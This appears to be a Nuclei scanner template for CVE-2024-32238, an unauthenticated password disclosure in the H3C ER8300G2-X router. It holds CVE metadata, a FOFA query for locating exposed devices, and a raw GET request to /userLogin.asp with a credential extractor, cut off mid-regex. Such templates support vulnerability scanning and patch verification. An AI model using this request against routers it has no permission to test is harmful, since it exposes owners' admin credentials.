id: CVE-2024-32238 info: name: H3C ER8300G2-X - Password Disclosure author: s4e-io,adeljck severity: critical description: | H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface. reference: - https://github.com/wy876/POC/blob/main/H3C/H3C%E8%B7%AF%E7%94%B1%E5%99%A8userLogin.asp%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md - https://github.com/asdfjkl11/CVE-2024-32238/issues/1 - https://www.h3c.com/cn/Products_And_Solution/InterConnect/Products/Routers/Products/Enterprise/ER/ER8300G2-X/ - https://github.com/20142995/nuclei-templates - https://github.com/FuBoLuSec/CVE-2024-32238 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-32238 cwe-id: CWE-522 epss-score: 0.00053 epss-percentile: 0.23191 metadata: verified: true max-request: 2 fofa-query: body="icg_helpScript.js" tags: cve,cve2024,h3c,router,info-leak flow: http(1) && http(2) http: - raw: - | GET /userLogin.asp HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: module_name part: body internal: true group: 1 regex: - "